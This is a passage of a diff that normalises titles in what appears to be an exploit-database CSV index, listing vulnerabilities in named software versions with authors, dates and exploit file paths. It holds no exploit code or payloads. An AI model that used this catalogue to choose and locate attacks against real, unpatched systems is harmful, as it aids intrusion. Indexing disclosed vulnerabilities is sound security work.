24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",windows,remote,0 @@ -21221,7 +21221,7 @@ id,file,description,date,author,platform,type,port 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 -24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x album_portal.php Remote File Include",2004-04-19,Officerrr,php,webapps,0 +24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 24028,platforms/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow",2004-04-20,"securma massine",windows,remote,0 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0 @@ -21239,7 +21239,7 @@ id,file,description,date,author,platform,type,port 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Remote Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local,0 -24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 +24044,platforms/php/webapps/24044.txt,"phpLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 @@ -21295,7 +21295,7 @@ id,file,description,date,author,platform,type,port 24101,platforms/windows/remote/24101.txt,"Microsoft Outlook 2003 Predictable File Location Weakness",2004-05-10,http-equiv,windows,remote,0 24102,platforms/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 Embedded Image URI Obfuscation Weakness",2004-05-10,http-equiv,windows,remote,0 24103,platforms/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",windows,dos,0 -24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple Remote SQL Injection Vulnerabilities",2004-05-10,"Hillel Himovich",php,webapps,0 +24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injection Vulnerabilities",2004-05-10,"Hillel Himovich",php,webapps,0 24105,platforms/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 Internet Access Control Bypass",2004-05-10,"Nuno Costa",linux,remote,0 24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,linux,remote,0 24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21374,7 +21374,7 @@ id,file,description,date,author,platform,type,port 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 24181,platforms/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service",2004-06-08,"Thomas Walpuski",openbsd,dos,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 -24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection",2004-06-09,verb0s@virtualnova.net,php,webapps,0 +24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd SQL Injection",2004-06-09,verb0s@virtualnova.net,php,webapps,0 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation",2004-06-09,"Thomas Ryan",asp,webapps,0 24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 ReturnURL Parameter Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps,0 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module categories Parameter XSS",2004-06-11,"Janek Vind",java,webapps,0 @@ -21484,7 +21484,7 @@ id,file,description,date,author,platform,type,port 24294,platforms/php/webapps/24294.txt,"WordPress Developer Formatter - CSRF",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0 -24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.php Remote File Include",2004-07-20,"Radek Hulan",php,webapps,0 +24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",windows,remote,0 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 @@ -21499,7 +21499,7 @@ id,file,description,date,author,platform,type,port 24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,Metasploit,multiple,remote,0 24309,platforms/java/remote/24309.rb,"Java Applet AverageRangeStatisticImpl Remote Code Execution",2013-01-24,Metasploit,java,remote,0 24310,platforms/unix/remote/24310.rb,"ZoneMinder Video Server packageControl Command Execution",2013-01-24,Metasploit,unix,remote,0 -24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 Site Parameter Remote File Include",2004-07-24,"Francisco Alisson",php,webapps,0 +24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 Site Parameter Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps,0 24312,platforms/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x Refresh Security Property Spoofing",2004-07-26,E.Kellinis,linux,remote,0 24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_search.asp Typeen Parameter XSS",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24314,platforms/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_edit.asp SQL Parameter XSS",2004-07-26,"Ferruh Mavituna",asp,webapps,0 @@ -21639,7 +21639,7 @@ id,file,description,date,author,platform,type,port 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 -24459,platforms/linux/local/24459.sh,"Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 +24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 @@ -21746,7 +21746,7 @@ id,file,description,date,author,platform,type,port 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24584,platforms/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module Remote Buffer Overflow",2004-09-08,Komrade,windows,remote,0 -24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Include",2004-09-09,"Ahmad Muammar",php,webapps,0 +24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",php,webapps,0 24586,platforms/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x Game Server Remote Denial of Service",2004-09-09,"Luigi Auriemma",windows,dos,0 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0 @@ -21813,7 +21813,7 @@ id,file,description,date,author,platform,type,port 24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",multiple,remote,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0 -24657,platforms/php/webapps/24657.txt,"BlackBoard Internet Newsboard System 1.5.1 - Remote File Include",2004-10-06,"Lin Xiaofeng",php,webapps,0 +24657,platforms/php/webapps/24657.txt,"BlackBoard Internet Newsboard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2004-10-06,"Pedro Sanches",php,webapps,0 24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x index.php Multiple Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 @@ -21896,14 +21896,14 @@ id,file,description,date,author,platform,type,port 24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos,0 -24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - Remote SQL Injection",2004-11-14,ruggine,php,webapps,0 +24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps,0 24740,platforms/hardware/webapps/24740.txt,"AirDrive HD 1.6 iPad iPhone - Multiple Vulnerabilities",2013-02-24,Vulnerability-Lab,hardware,webapps,0 24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos,0 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injection Vulnerabilities",2013-03-13,"Saadat Ullah",php,webapps,0 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 -24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 +24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 @@ -21916,7 +21916,7 @@ id,file,description,date,author,platform,type,port 24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 -24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - Remote SQL Injection",2004-11-20,"axl daivy",php,webapps,0 +24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 @@ -21995,7 +21995,7 @@ id,file,description,date,author,platform,type,port 24837,platforms/php/webapps/24837.txt,"PhpGedView 2.5/2.6 Timeline.php SQL Injection",2004-01-12,JeiAr,php,webapps,0 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos,0 -24840,platforms/asp/webapps/24840.txt,"ASP-Rider Remote SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 +24840,platforms/asp/webapps/24840.txt,"ASP-Rider SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 24841,platforms/windows/dos/24841.txt,"Adobe Acrobat/Acrobat Reader 6.0 ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 24842,platforms/php/webapps/24842.txt,"IWebNegar Multiple SQL Injection Vulnerabilities",2004-12-15,"Shervin Khaleghjou",php,webapps,0 24843,platforms/osx/dos/24843.txt,"Apple Safari Web Browser 1.x HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,osx,dos,0 @@ -22044,7 +22044,7 @@ id,file,description,date,author,platform,type,port 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b (awards.php id param) - Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 -24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 +24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php loginid param) - SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 @@ -22059,7 +22059,7 @@ id,file,description,date,author,platform,type,port 24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what param) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 -24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 +24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a (editor.php) - Persistent XSS",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress FuneralPress Plugin 1.1.6 - Persistent XSS",2013-04-02,"Rob Armstrong",php,webapps,0 @@ -22100,7 +22100,7 @@ id,file,description,date,author,platform,type,port 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0 24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 -24954,platforms/php/webapps/24954.txt,"Simple HRM System <= 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 +24954,platforms/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 - / DIR-815 diagnostic.php Command Execution",2013-04-12,Metasploit,hardware,remote,0 24958,platforms/windows/remote/24958.py,"MinaliC Webserver 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 @@ -22114,15 +22114,15 @@ id,file,description,date,author,platform,type,port 24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0 25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",php,webapps,0 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 -25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Include",2005-06-10,Status-x,php,webapps,0 +25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps,0 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.php Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 -24973,platforms/php/webapps/24973.txt,"VoipNow <= 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 +24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,Metasploit,multiple,remote,0 -25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 +25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 File List Buffer Overflow",2004-12-15,"James Longstreet",multiple,remote,0 @@ -22130,7 +22130,7 @@ id,file,description,date,author,platform,type,port 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 -24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple Remote SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 +24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Remote Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 @@ -22149,11 +22149,11 @@ id,file,description,date,author,platform,type,port 25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include",2005-03-04,"Filip Groszynski",php,webapps,0 25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0 -25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Include",2005-03-05,mozako,php,webapps,0 -25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Include",2005-03-07,"Filip Groszynski",php,webapps,0 +25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps,0 +25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 -29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Include",2006-12-13,the_Edit0r,php,webapps,0 +29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 @@ -22199,9 +22199,9 @@ id,file,description,date,author,platform,type,port 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 -25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.php Remote File Include",2004-01-27,"Cedric Cochin",php,webapps,0 +25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x Index.php HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0 -25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - Remote SQL Injection",2004-12-22,zib,php,webapps,0 +25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0 25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0 25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0 25048,platforms/php/webapps/25048.txt,"PsychoStats 2.x Login Parameter Cross-Site Scripting",2004-12-22,"James Bercegay",php,webapps,0 @@ -22280,7 +22280,7 @@ id,file,description,date,author,platform,type,port 25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a Long GET Request DoS",2005-02-19,MurDoK,hardware,dos,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 -25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Include",2005-02-19,kc,php,webapps,0 +25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash PoC",2013-05-01,Asesino04,windows,dos,0 25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6.0 Pop-up Window Title Bar Spoofing Weakness",2005-02-21,"bitlance winter",windows,remote,0 25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 @@ -22309,7 +22309,7 @@ id,file,description,date,author,platform,type,port 25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - display_tbl_links.lib.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - theme_left.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 